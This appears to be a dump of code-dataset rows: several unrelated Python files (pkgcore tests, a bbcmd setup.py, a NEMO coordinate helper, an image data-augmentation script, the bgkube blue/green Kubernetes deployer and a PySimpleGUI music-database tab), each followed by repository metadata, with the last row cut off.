"*** syncing 'badrepo'...",
"*** failed syncing 'badrepo'",
"*** synced 'goodrepo'",
], [
"!!! failed sync'ing 'badrepo'",
],
'goodrepo', 'badrepo',
goodrepo=success_section, badrepo=failure_section)
class fake_pkg(CPV):
def __init__(self, repo, *a, **kw):
CPV.__init__(self, *a, **kw)
object.__setattr__(self, 'repo', repo)
def derive_op(name, op, *a, **kw):
if isinstance(name, basestring):
name = [name]
name = ['finalize_data'] + list(name)
class new_op(op):
def f(*a, **kw):
return True
for x in name:
locals()[x] = f
del f, x
return new_op(*a, **kw)
class fake_operations(operations):
def _cmd_implementation_install(self, pkg, observer):
self.repo.installed.append(pkg)
return derive_op('add_data', install, self.repo, pkg, observer)
def _cmd_implementation_uninstall(self, pkg, observer):
self.repo.uninstalled.append(pkg)
return derive_op('remove_data', uninstall, self.repo, pkg, observer)
def _cmd_implementation_replace(self, oldpkg, newpkg, observer):
self.repo.replaced.append((oldpkg, newpkg))
return derive_op(('add_data', 'remove_data'),
replace, self.repo, oldpkg, newpkg, observer)
class fake_repo(util.SimpleTree):
operations_kls = fake_operations
def __init__(self, data, frozen=False, livefs=False):
self.installed = []
self.replaced = []
self.uninstalled = []
util.SimpleTree.__init__(self, data,
pkg_klass=partial(fake_pkg, self))
self.livefs = livefs
self.frozen = frozen
def make_repo_config(repo_data, livefs=False, frozen=False):
def repo():
return fake_repo(repo_data, livefs=livefs, frozen=frozen)
repo.pkgcore_config_type = ConfigHint(typename='repo')
return basics.HardCodedConfigSection({'class':repo})
class TestCopy(TestCase, helpers.ArgParseMixin):
_argparser = pmaint.copy
def execute_main(self, *a, **kw):
config = self.parse(*a, **kw)
out = PlainTextFormatter(BytesIO())
ret = config.main_func(config, out, out)
return ret, config, out
def test_normal_function(self):
ret, config, out = self.execute_main(
'trg', '--source-repo', 'src',
'*',
src=make_repo_config({'sys-apps':{'portage':['2.1', '2.3']}}),
trg=make_repo_config({})
)
self.assertEqual(ret, 0, "expected non zero exit code")
self.assertEqual(map(str, config.target_repo.installed),
['sys-apps/portage-2.1', 'sys-apps/portage-2.3'])
self.assertEqual(config.target_repo.uninstalled,
config.target_repo.replaced,
msg="uninstalled should be the same as replaced; empty")
d = {'sys-apps':{'portage':['2.1', '2.2']}}
ret, config, out = self.execute_main(
'trg', '--source-repo', 'src',
'=sys-apps/portage-2.1',
src=make_repo_config(d),
trg=make_repo_config(d)
)
self.assertEqual(ret, 0, "expected non zero exit code")
self.assertEqual([map(str, x) for x in config.target_repo.replaced],
[['sys-apps/portage-2.1', 'sys-apps/portage-2.1']])
self.assertEqual(config.target_repo.uninstalled,
config.target_repo.installed,
msg="installed should be the same as uninstalled; empty")
def test_ignore_existing(self):
ret, config, out = self.execute_main(
'trg', '--source-repo', 'src',
'*', '--ignore-existing',
src=make_repo_config({'sys-apps':{'portage':['2.1', '2.3']}}),
trg=make_repo_config({})
)
self.assertEqual(ret, 0, "expected non zero exit code")
self.assertEqual(map(str, config.target_repo.installed),
['sys-apps/portage-2.1', 'sys-apps/portage-2.3'])
self.assertEqual(config.target_repo.uninstalled,
config.target_repo.replaced,
msg="uninstalled should be the same as replaced; empty")
ret, config, out = self.execute_main(
'trg', '--source-repo', 'src',
'*', '--ignore-existing',
src=make_repo_config({'sys-apps':{'portage':['2.1', '2.3']}}),
trg=make_repo_config({'sys-apps':{'portage':['2.1']}})
)
self.assertEqual(ret, 0, "expected non zero exit code")
self.assertEqual(map(str, config.target_repo.installed),
['sys-apps/portage-2.3'])
self.assertEqual(config.target_repo.uninstalled,
config.target_repo.replaced,
msg="uninstalled should be the same as replaced; empty")
class TestRegen(TestCase, helpers.ArgParseMixin):
_argparser = pmaint.regen
def test_parser(self):
class TestSimpleTree(util.SimpleTree):
pass
@configurable(typename='repo')
def fake_repo():
return TestSimpleTree({})
options = self.parse(
'spork', '--threads', '2', spork=basics.HardCodedConfigSection(
{'class': fake_repo}))
self.assertEqual(
[options.repo.__class__, options.threads],
[TestSimpleTree, 2])
| 33.773109 | 78 | 0.59903 | 892 | 8,038 | 5.241031 | 0.202915 | 0.048128 | 0.03893 | 0.041711 | 0.412406 | 0.327701 | 0.298824 | 0.281925 | 0.278503 | 0.259465 | 0 | 0.009697 | 0.268724 | 8,038 | 237 | 79 | 33.915612 | 0.785641 | 0.016546 | 0 | 0.248619 | 0 | 0 | 0.137957 | 0.002658 | 0 | 0 | 0 | 0 | 0.104972 | 1 | 0.104972 | false | 0.005525 | 0.077348 | 0.016575 | 0.320442 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
65461d78a306d8b0f5ea1ccbe0dc3a344e60948d | 1,093 | py | Python | setup.py | luciancooper/bbcmd | 307aea02d245b3d217bb1a7f76a985b98da54e40 | [
"MIT"
] | 2 | 2018-12-07T20:13:03.000Z | 2020-06-03T11:34:59.000Z | setup.py | luciancooper/bbcmd | 307aea02d245b3d217bb1a7f76a985b98da54e40 | [
"MIT"
] | null | null | null | setup.py | luciancooper/bbcmd | 307aea02d245b3d217bb1a7f76a985b98da54e40 | [
"MIT"
] | null | null | null | from setuptools import setup,find_packages
with open("README.md", "r") as f:
long_description = f.read()
setup(
name='bbcmd',
version='1.2',
author='Lucian Cooper',
url='https://github.com/luciancooper/bbcmd',
description='Baseball Statistics Simulator',
long_description=long_description,
long_description_content_type="text/markdown",
keywords='baseball statistics sabermetrics',
license='MIT',
classifiers=[
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 3.6',
'Operating System :: MacOS',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX :: Linux',
],
packages=find_packages(),
install_requires=['cmdprogress','numpy','pandas','beautifulsoup4'],
entry_points={
'console_scripts': [
'bbsim = bbsim.__main__:main',
'bbscrape = bbscrape.__main__:main',
]
},
)
| 31.228571 | 71 | 0.628545 | 105 | 1,093 | 6.361905 | 0.695238 | 0.08982 | 0.056886 | 0.08982 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005959 | 0.232388 | 1,093 | 34 | 72 | 32.147059 | 0.790226 | 0 | 0 | 0 | 0 | 0 | 0.483074 | 0.020128 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.03125 | 0 | 0.03125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
654826f05190445e1a9ed6939d66acea1e8e5bbc | 2,528 | py | Python | data/nemo.py | dkllrjr/PyKeller | 6788876a0ab273c19e1643d7bce637f6e700eb99 | [
"MIT"
] | null | null | null | data/nemo.py | dkllrjr/PyKeller | 6788876a0ab273c19e1643d7bce637f6e700eb99 | [
"MIT"
] | null | null | null | data/nemo.py | dkllrjr/PyKeller | 6788876a0ab273c19e1643d7bce637f6e700eb99 | [
"MIT"
] | null | null | null | ##############################################################################
# Python3
# laplace
# Tue Mar 3 12:14:20 2020
##############################################################################
import numpy as np
import PyKeller.data.model as PKdm
def lat_lon2nparray(xrvar):
lat = np.array(xrvar.nav_lat)
lon = np.array(xrvar.nav_lon)
lat_lon = []
for i in range(lat.shape[0]):
for j in range(lat.shape[1]):
lat_lon.append([lat[i,j],lon[i,j]])
lat_lon_np = np.array(lat_lon)
lat_lon_np = lat_lon_np.reshape(lat.shape[0],lat.shape[1],2)
return lat_lon_np
def find_loc(var,loc):
# loc needs to be a list of lists => [[lat,lon],[lat,lon]]
lat = np.array(var.nav_lat)
lon = np.array(var.nav_lon)
lat_lon = []
for i in range(lat.shape[0]):
for j in range(lat.shape[1]):
lat_lon.append([lat[i,j],lon[i,j]])
ind_loc = []
for i in range(len(loc)):
ind_loc.append(PKdm.lat_lon_near_angle(lat_lon,loc[i]))
lat_lon_np = np.array(lat_lon)
lat_lon_np = lat_lon_np.reshape(lat.shape[0],lat.shape[1],2)
ind_loc_np = np.array(ind_loc)
ind_loc_np = ind_loc_np.reshape(len(loc),2)
ind = []
for k in range(ind_loc_np.shape[0]):
for i in range(lat_lon_np.shape[0]):
for j in range(lat_lon_np.shape[1]):
if tuple(lat_lon_np[i,j]) == tuple(ind_loc_np[k]):
ind.append([i,j])
ind = np.array(ind)
return ind
def find_loc_SI(SI,loc):
# loc needs to be a list of lists => [[lat,lon],[lat,lon]]
lat = SI['latitude']
lon = SI['longitude']
date = SI['date']
i = 0
ind_date = [0]
while i < len(date) - 1:
if date[i] < date[i+1]:
ind_date.append(i+1)
i += 1
ind_date.append(i+1)
lat_lon = []
for i in range(len(lat)):
lat_lon.append([lat[i],lon[i]])
ind_loc = []
for i in range(len(loc)):
ind_loc.append(PKdm.lat_lon_near_angle(lat_lon,loc[i]))
# return ind_loc,ind_date
ind = []
for i in range(len(ind_loc)):
ind.append([])
for j in range(len(ind_loc[i])):
for k in range(ind_date[j],ind_date[j+1]):
# print(tuple(lat_lon[k]),tuple(ind_loc[i][j]))
if tuple(lat_lon[k]) == tuple(ind_loc[i][j]):
ind[i].append(k)
ind[i] = np.array(ind[i])
return ind | 27.78022 | 78 | 0.511076 | 403 | 2,528 | 3.027295 | 0.146402 | 0.147541 | 0.078689 | 0.063115 | 0.615574 | 0.518033 | 0.483607 | 0.439344 | 0.439344 | 0.398361 | 0 | 0.019294 | 0.282437 | 2,528 | 91 | 79 | 27.78022 | 0.653252 | 0.095728 | 0 | 0.416667 | 0 | 0 | 0.009892 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | false | 0 | 0.033333 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6548a1ba90f575f025ae972016cf84eed6574920 | 6,465 | py | Python | generate/generate_data_augmentation_zones.py | prise-3d/Thesis-DataAugmentation | 58e7fa9f4a6bf3e2e3cee56d827fabd7190bcc84 | [
"MIT"
] | null | null | null | generate/generate_data_augmentation_zones.py | prise-3d/Thesis-DataAugmentation | 58e7fa9f4a6bf3e2e3cee56d827fabd7190bcc84 | [
"MIT"
] | null | null | null | generate/generate_data_augmentation_zones.py | prise-3d/Thesis-DataAugmentation | 58e7fa9f4a6bf3e2e3cee56d827fabd7190bcc84 | [
"MIT"
] | null | null | null | # main imports
import os, sys
import argparse
import pickle
import random
import numpy as np
import math
# image processing imports
from PIL import Image
from ipfml.processing import transform, segmentation
from ipfml import utils
# modules imports
sys.path.insert(0, '') # trick to enable import of main folder module
import custom_config as cfg
from modules.utils import data as dt
import utils as utils_functions
# getting configuration information
zone_folder = cfg.zone_folder
min_max_filename = cfg.min_max_filename_extension
# define all scenes values
scenes_list = cfg.scenes_names
scenes_indexes = cfg.scenes_indices
path = cfg.dataset_path
zones = cfg.zones_indices
seuil_expe_filename = cfg.seuil_expe_filename
output_data_folder = cfg.output_data_folder
image_scene_size = cfg.image_scene_size
image_zone_size = cfg.image_zone_size
possible_point_zone = cfg.possible_point_zone
def main():
parser = argparse.ArgumentParser(description="Compute and prepare data augmentation of scenes")
parser.add_argument('--data', type=str, help="object filename saved using pickle", required=True)
parser.add_argument('--scene', type=str, help="scene name to display click information", required=True, choices=cfg.scenes_names)
parser.add_argument('--n', type=int, help="number of clics per zone wished")
parser.add_argument('--images', type=int, help="number of images (with estimated thresholds) wished by scene")
parser.add_argument('--output', type=str, help="output file with new thresholds data")
args = parser.parse_args()
p_data = args.data
p_scene = args.scene
p_n = args.n
p_images = args.images
p_output = args.output
# load data extracted by zones
fileObject = open(p_data, 'rb')
scenes_data = pickle.load(fileObject)
# get clicks data of specific scene
scene_data = scenes_data[p_scene]
# getting image zone size and usefull information
zone_width, zone_height = image_zone_size
scene_width, scene_height = image_scene_size
nb_x_parts = math.floor(scene_width / zone_width)
# get scenes list
scenes = os.listdir(path)
# remove min max file from scenes folder
scenes = [s for s in scenes if min_max_filename not in s]
# go ahead each scenes in order to get threshold
for folder_scene in scenes:
scene_path = os.path.join(path, folder_scene)
# construct each zones folder name
zones_folder = []
zones_threshold = []
# get zones list info
for index in zones:
index_str = str(index)
if len(index_str) < 2:
index_str = "0" + index_str
current_zone = "zone"+index_str
zones_folder.append(current_zone)
zone_path = os.path.join(scene_path, current_zone)
with open(os.path.join(zone_path, seuil_expe_filename)) as f:
zones_threshold.append(int(f.readline()))
# generate a certain number of images
for i in range(p_images):
###########################################
# Compute weighted threshold if necessary #
###########################################
##############################
# 1. Get random point from possible position
##############################
possible_x, possible_y = possible_point_zone
p_x, p_y = (random.randrange(possible_x), random.randrange(possible_y))
##############################
# 2. Get zone indices of this point (or only one zone if `%` 200)
##############################
# coordinate of specific zone, hence use threshold of zone
if p_x % zone_width == 0 and p_y % zone_height == 0:
zone_index = utils_functions.get_zone_index(p_x, p_y)
final_threshold = int(zones_threshold[zone_index])
else:
# get zone identifiers of this new zones (from endpoints)
p_top_left = (p_x, p_y)
p_top_right = (p_x + zone_width, p_y)
p_bottom_right = (p_x + zone_width, p_y + zone_height)
p_bottom_left = (p_x, p_y + zone_height)
points = [p_top_left, p_top_right, p_bottom_right, p_bottom_left]
p_zones_indices = []
# for each points get threshold information
for p in points:
x, y = p
zone_index = utils_functions.get_zone_index(x, y)
p_zones_indices.append(zone_index)
# 2.3. Compute area of intersected zones (and weights)
# get proportions of pixels of img into each zone
overlaps = []
p_x_max = p_x + zone_width
p_y_max = p_y + zone_height
for index, zone_index in enumerate(p_zones_indices):
x_zone = (zone_index % nb_x_parts) * zone_width
y_zone = (math.floor(zone_index / nb_x_parts)) * zone_height
x_max_zone = x_zone + zone_width
y_max_zone = y_zone + zone_height
# computation of overlap
# x_overlap = max(0, min(rect1.right, rect2.right) - max(rect1.left, rect2.left))
# y_overlap = max(0, min(rect1.bottom, rect2.bottom) - max(rect1.top, rect2.top))
x_overlap = max(0, min(x_max_zone, p_x_max) - max(x_zone, p_x))
y_overlap = max(0, min(y_max_zone, p_y_max) - max(y_zone, p_y))
overlapArea = x_overlap * y_overlap
overlaps.append(overlapArea)
overlapSum = sum(overlaps)
# area weights are saved into proportions
proportions = [item / overlapSum for item in overlaps]
# 2.4. Count number of clicks present into each zones intersected (and weights)
# 2.5. Compute final threshold of `x` and `y` using `3` and `4` steps
p_thresholds = np.array(zones_threshold)[p_zones_indices]
# 3. Save this new entry into .csv file (scene_name; x; y; threshold)
if __name__== "__main__":
main() | 36.117318 | 133 | 0.589482 | 825 | 6,465 | 4.370909 | 0.232727 | 0.006101 | 0.023572 | 0.004437 | 0.079035 | 0.044648 | 0.029395 | 0 | 0 | 0 | 0 | 0.006926 | 0.307657 | 6,465 | 179 | 134 | 36.117318 | 0.798704 | 0.202784 | 0 | 0 | 0 | 0 | 0.059793 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.01087 | false | 0 | 0.130435 | 0 | 0.141304 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
654b59f37671da6026e05478c0fb9645705e5478 | 9,597 | py | Python | bgkube/bg.py | stphivos/bg-kube | 3936c2899f76b2f58df7a5f38fac741c638562cf | [
"MIT"
] | 8 | 2017-11-24T12:07:02.000Z | 2020-04-27T03:27:58.000Z | bgkube/bg.py | stphivos/bg-kube | 3936c2899f76b2f58df7a5f38fac741c638562cf | [
"MIT"
] | 19 | 2017-11-14T23:35:31.000Z | 2022-03-08T22:50:02.000Z | bgkube/bg.py | stphivos/bg-kube | 3936c2899f76b2f58df7a5f38fac741c638562cf | [
"MIT"
] | null | null | null | from six import add_metaclass
from time import sleep
from bgkube import cmd, registries
from bgkube.api import KubeApi
from bgkube.run import Runner
from bgkube.errors import ActionFailedError
from bgkube.utils import output, log, timestamp, require, get_loadbalancer_address, is_host_up
class BgKubeMeta(type):
required = [
'cluster_zone', 'cluster_name', 'image_name', 'service_name', 'service_config', 'deployment_config'
]
optional = [
'context', 'dockerfile', 'env_file', 'smoke_tests_command', 'smoke_service_config', 'docker_machine_name',
'db_migrations_job_config_seed', 'db_migrations_status_command', 'db_migrations_apply_command',
'db_migrations_rollback_command', 'kops_state_store', 'container_registry', 'service_timeout',
'smoke_service_timeout', 'deployment_timeout', 'db_migrations_job_timeout', 'docker_build_args'
]
optional_defaults = {
'context': '.',
'dockerfile': './Dockerfile',
'container_registry': registries.DEFAULT,
'service_timeout': 120,
'smoke_service_timeout': 120,
'deployment_timeout': 120,
'db_migrations_job_timeout': 120,
'docker_build_args': ''
}
def __new__(mcs, name, bases, attrs):
attrs['required'] = mcs.required
attrs['optional'] = mcs.optional
for field in mcs.required + mcs.optional:
attrs[field] = mcs.optional_defaults.get(field, None)
return super(BgKubeMeta, mcs).__new__(mcs, name, bases, attrs)
@add_metaclass(BgKubeMeta)
class BgKube(object):
def __init__(self, options):
self.load_options(options)
self.kube_api = KubeApi()
self.runner = Runner(self.get_docker_daemon())
self.registry = registries.load(self.runner, options)
@property
def is_minikube(self):
return self.container_registry == 'local'
def get_docker_daemon(self):
return cmd.MINIKUBE_DOCKER_ENV if self.is_minikube else cmd.DOCKERMACHINE_ENV.format(self.docker_machine_name)
def load_options(self, options):
for opt in self.required:
setattr(self, opt, require(options, opt))
for opt in self.optional:
setattr(self, opt, getattr(options, opt, None) or getattr(self, opt))
@log('Building image {image_name} using {dockerfile}...')
def build(self):
tag = timestamp()
command = [cmd.DOCKER_BUILD.format(
context=self.context,
dockerfile=self.dockerfile,
image=self.image_name,
tag=tag,
)]
if self.docker_build_args:
command.append(' '.join('--build-arg {}'.format(b) for b in self.docker_build_args.split(' ')))
self.runner.start(' '.join(command))
return tag
@log('Pushing image {image_name}:{tag} to {registry}...')
def push(self, tag):
self.registry.push('{}:{}'.format(self.image_name, tag))
@log('Applying {_} using config: {filename}...')
def apply(self, _, filename, tag=None, color=''):
return self.kube_api.apply(filename, self.env_file, TAG=tag, COLOR=color, ENV_FILE=self.env_file)
def pod_find(self, tag):
results = [pod for pod in self.kube_api.pods(tag=tag) if pod.ready]
return results[0] if results else None
def pod_exec(self, tag, command, *args):
pod = self.pod_find(tag).name
return self.runner.start(cmd.KUBECTL_EXEC.format(pod=pod, command=command, args=' '.join(args)), capture=True)
def migrate_initial(self, tag):
if self.db_migrations_job_config_seed:
def job_completions_extractor(job):
completions = job.obj['spec']['completions']
succeeded_completions = job.obj['status']['succeeded']
return completions if succeeded_completions == completions else None
applied_objects = self.apply('db migration', self.db_migrations_job_config_seed, tag=tag)
self.wait_for_resource_running(
'Job',
'completions',
job_completions_extractor,
self.db_migrations_job_timeout,
*applied_objects
)
def migrate_apply(self, tag):
previous_state = None
if self.db_migrations_status_command:
previous_state = self.pod_exec(tag, self.db_migrations_status_command)
if self.db_migrations_apply_command:
self.pod_exec(tag, self.db_migrations_apply_command)
return previous_state
def migrate_rollback(self, tag, previous_state):
if self.db_migrations_rollback_command:
self.pod_exec(tag, self.db_migrations_rollback_command, previous_state)
def migrate(self, tag):
db_migrations_previous_state = None
is_initial = self.active_env() is None
if is_initial:
self.migrate_initial(tag)
else:
db_migrations_previous_state = self.migrate_apply(tag)
return is_initial, db_migrations_previous_state
def active_env(self):
service = self.kube_api.resource_by_name('Service', self.service_name)
return None if not service else service.obj['spec']['selector'].get('color', None)
def other_env(self):
return {
'blue': 'green',
'green': 'blue'
}.get(self.active_env(), None)
def deploy(self, tag):
color = self.other_env() or 'blue'
applied_objects = self.apply('deployment', self.deployment_config, tag=tag, color=color)
self.wait_for_resource_running(
'Deployment',
'replicas',
lambda deployment: deployment.replicas if deployment.ready and self.pod_find(tag) else None,
self.deployment_timeout,
*applied_objects
)
return color
@log('Waiting for {resource_type} {prop} to become available')
def wait_for_resource_running(self, resource_type, prop, prop_extractor, timeout_seconds, *object_names):
def try_extract_value(resource_name):
try:
result = self.kube_api.resource_by_name(resource_type, resource_name)
return prop_extractor(result or {})
except (IndexError, KeyError, AttributeError):
return None
def extract_value_with_timeout(resource_name):
value = None
if timeout_seconds:
attempts = 0
while not value and attempts < timeout_seconds:
sleep(1)
attempts += 1
output('.', '', flush=True)
value = try_extract_value(resource_name)
else:
value = try_extract_value(resource_name)
if value:
output('\n{} {} {} is: {}'.format(resource_type, resource_name, prop, value))
elif timeout_seconds:
raise ActionFailedError(
'\nFailed after {} seconds elapsed. For more info try running: $ kubectl describe {} {}'.format(
timeout_seconds, resource_type, resource_name))
return value
values = [extract_value_with_timeout(name) for name in object_names]
return values
@log('Running smoke tests on {color} deployment...')
def smoke_test(self, color):
if self.smoke_service_config:
def service_host_extractor(service):
if self.is_minikube:
service_address = self.runner.start(cmd.MINIKUBE_SERVICE_URL.format(service.name), capture=True)
else:
service_address = get_loadbalancer_address(service)
return service_address if is_host_up(service_address) else None
applied_objects = self.apply('smoke service', self.smoke_service_config, color=color)
smoke_service_address = ','.join(self.wait_for_resource_running(
'Service',
'host',
service_host_extractor,
self.smoke_service_timeout,
*applied_objects
))
return_code = self.runner.start(self.smoke_tests_command, TEST_HOST=smoke_service_address, silent=True)
return return_code == 0
return True
@log('Promoting {color} deployment...')
def swap(self, color):
self.apply('public service', self.service_config, color=color)
self.wait_for_resource_running(
'Service',
'status',
lambda service: 'ready' if service.exists(ensure=True) else None,
self.service_timeout,
self.service_name
)
@log('Publishing...')
def publish(self):
next_tag = self.build()
self.push(next_tag)
next_color = self.deploy(next_tag)
is_initial, db_migrations_previous_state = self.migrate(next_tag)
health_ok = self.smoke_test(next_color)
if health_ok:
self.swap(next_color)
else:
if not is_initial:
self.migrate_rollback(next_tag, db_migrations_previous_state)
raise ActionFailedError('Cannot promote {} deployment because smoke tests failed'.format(next_color))
output('Done.')
@log('Rolling back to previous deployment...')
def rollback(self):
color = self.other_env()
if color:
self.swap(color)
else:
raise ActionFailedError('Cannot rollback to a previous environment because one does not exist.')
output('Done.')
| 36.352273 | 118 | 0.62853 | 1,099 | 9,597 | 5.22657 | 0.182894 | 0.041783 | 0.02507 | 0.01915 | 0.158948 | 0.098364 | 0.030641 | 0.012883 | 0 | 0 | 0 | 0.002434 | 0.272168 | 9,597 | 263 | 119 | 36.490494 | 0.8199 | 0 | 0 | 0.082524 | 0 | 0 | 0.139106 | 0.021465 | 0 | 0 | 0 | 0 | 0 | 1 | 0.126214 | false | 0 | 0.033981 | 0.019417 | 0.281553 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
654bc602b92a4d39e2692072c6e62be4b98b7a8c | 5,852 | py | Python | src/tabs/add.py | EthanG45/CSE412-HAML-Project | e6f754b2de35079453c1bf5e8814dc5fe4b6741c | [
"MIT"
] | 1 | 2022-02-09T05:42:43.000Z | 2022-02-09T05:42:43.000Z | src/tabs/add.py | EthanG45/CSE412-HAML-Project | e6f754b2de35079453c1bf5e8814dc5fe4b6741c | [
"MIT"
] | null | null | null | src/tabs/add.py | EthanG45/CSE412-HAML-Project | e6f754b2de35079453c1bf5e8814dc5fe4b6741c | [
"MIT"
] | 3 | 2020-11-28T23:06:03.000Z | 2022-03-14T02:23:50.000Z | import PySimpleGUI as sg
from faker import Faker
fake = Faker()
Faker.seed(2)
### #### #### #### #### #### #### #### #### ###
# ADD TABLE TABS #
### #### #### #### #### #### #### #### #### ###
class AddTab:
def __init__(self, db):
self.db = db
self.albumNameList = self.db.allAlbumName()
self.artistNameList = self.db.allArtistName()
self.recordLabelList = self.db.allCompanyName()
self.instrumentList = self.db.allInstName()
self.genreList = self.db.allGenre()
def updateLists(self):
self.albumNameList = self.db.allAlbumName()
self.artistNameList = self.db.allArtistName()
self.recordLabelList = self.db.allCompanyName()
self.instrumentList = self.db.allInstName()
self.genreList = self.db.allGenre()
def addTabGUI(self):
ageList = []
locationList = []
for x in range(155):
ageList.append(x)
for x in range(0, 1000):
locationList.append(fake.city())
yearList = list(range(2021, 999, -1))
addTableRecord = sg.Tab(
'Record Label',
[[sg.Text("Add a Record Label", size=(1270, 1))],
[sg.Text("Company Name"), sg.Input(key='-companyName-C01-')],
[sg.Text("Label Location"), sg.Combo(locationList, key='-labelLocation-C01-')],
[sg.Text("What album did this record label publish?", size=(1270, 1))],
# Album elements
[sg.Text("Title"), sg.Listbox(values=self.albumNameList,
key='-TITLE-C01-', size=(50, 20))],
[sg.Text("Date Established"), sg.Input(key='-dateEstablished-C01-', size=(20, 1)),
sg.CalendarButton('Date Picker', close_when_date_chosen=True, format='%Y-%m-%d', target='-dateEstablished-C01-', no_titlebar=False, key='Calendar-C01')],
[sg.Button('ADD', key='-BUTTON-C01-')],
[sg.Text(size=(100, 720), key='-OUTPUT-C01-')]],
key='C01'
) # end of tab Record Label
addTableArtist = sg.Tab(
'Artist',
[[sg.Text("Add an Artist", size=(1270, 1))],
# Artist elements
[sg.Text("Artist Name"), sg.Input(key='-ARTIST-C02-')],
[sg.Text("Age"), sg.Slider(range=(1, 155),
default_value=42,
size=(40, 15),
orientation='horizontal',
font=('Helvetica', 12), key='-AGE-C02-')],
# Musician elements
[sg.Text("Instrument"), sg.Listbox(values=self.instrumentList, key='-INSTRUMENT-C02-', size=(10, 5))],
[sg.Text("Band Name"), sg.Input(key='-BAND-C02-')],
# Album Elements
[sg.Text("What album did this artist make?", size=(1270, 1))],
[sg.Text("Add an Album")],
[sg.Text("Title"), sg.Input(key='-ALBUM-TITLE-C02-')],
[sg.Text("Add the Album's first song")],
[sg.Text("Title"), sg.Input(key='-SONG-TITLE-C02-')],
[sg.Text("Genre"), sg.Listbox(values=self.genreList, key='-GENRE-C02-', size=(10, 5))],
[sg.Text("Release Year"), sg.Combo(yearList, key='-RELEASE-YEAR-C02-')],
[sg.Text("Record Label"), sg.Listbox(values=self.recordLabelList, key='-RECORD-TITLE-C02-', size=(40, 8))],
[sg.Button('ADD', key='-BUTTON-C02-')],
[sg.Text(size=(100, 720), key='-OUTPUT-C02-')]
],
key='C02'
)
addTableAlbum = sg.Tab(
'Album',
[[sg.Text("Add an Album")],
[sg.Text("Title"), sg.Input(key='-ALBUM-TITLE-C04-')],
[sg.Text("Add the Album's first song")],
[sg.Text("Title"), sg.Input(key='-SONG-TITLE-C04-')],
[sg.Text("Genre"), sg.Listbox(values=self.genreList,
key='-GENRE-C04-', size=(10, 5))],
[sg.Text("Release Year"), sg.Combo(
yearList, key='-RELEASE-YEAR-C04-')],
[sg.Text("Artist"), sg.Listbox(values=self.artistNameList,
key='-ARTIST-TITLE-C04-', size=(50, 20))],
[sg.Button('ADD', key='-BUTTON-C04-')],
[sg.Text(size=(100, 720), key='-OUTPUT-C04-')]
],
key='C04'
)
addTableSong = sg.Tab(
'Song',
[[sg.Text("Add a song")],
[sg.Text("Title"), sg.Input(key='-TITLE-C05-')],
[sg.Text("Genre"), sg.Listbox(values=self.genreList,
key='-GENRE-C05-', size=(10, 10))],
[sg.Text("Album Title"), sg.Listbox(values=self.albumNameList,
key='-ALBUM-TITLE-C05-', size=(50, 20))],
[sg.Text("Release Year"), sg.Combo(
yearList, key='-releaseYear-C05-')],
[sg.Button('ADD', key='-BUTTON-C05-')],
[sg.Text(size=(100, 720), key='-OUTPUT-C05-')]
],
key='C05'
)
### #### #### #### #### #### #### #### #### ###
# END OF ADD TABLE TABS #
### #### #### #### #### #### #### #### #### ###
addTab = sg.Tab(
'Add',
[[sg.TabGroup(
[[
addTableSong,
addTableAlbum,
addTableArtist,
addTableRecord
]],
key='tabgroupAdd',
enable_events=True
) # end of TabGroup
]],
key='add_tab'
) # end of tab add
return addTab
| 36.123457 | 167 | 0.458476 | 590 | 5,852 | 4.528814 | 0.233898 | 0.078593 | 0.033683 | 0.056886 | 0.462575 | 0.415419 | 0.391841 | 0.31512 | 0.302021 | 0.302021 | 0 | 0.046438 | 0.352358 | 5,852 | 161 | 168 | 36.347826 | 0.658575 | 0.038278 | 0 | 0.1875 | 0 | 0 | 0.173586 | 0.007715 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026786 | false | 0 | 0.017857 | 0 | 0.0625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8daa8cfa08fbe78f266741f068409aae4cb7fd2 | 358 | py | Python | star.py | caiovini/space-ship3d | d33383b199a6b01931ada9cc3405f69a6569d332 | [
"MIT"
] | null | null | null | star.py | caiovini/space-ship3d | d33383b199a6b01931ada9cc3405f69a6569d332 | [
"MIT"
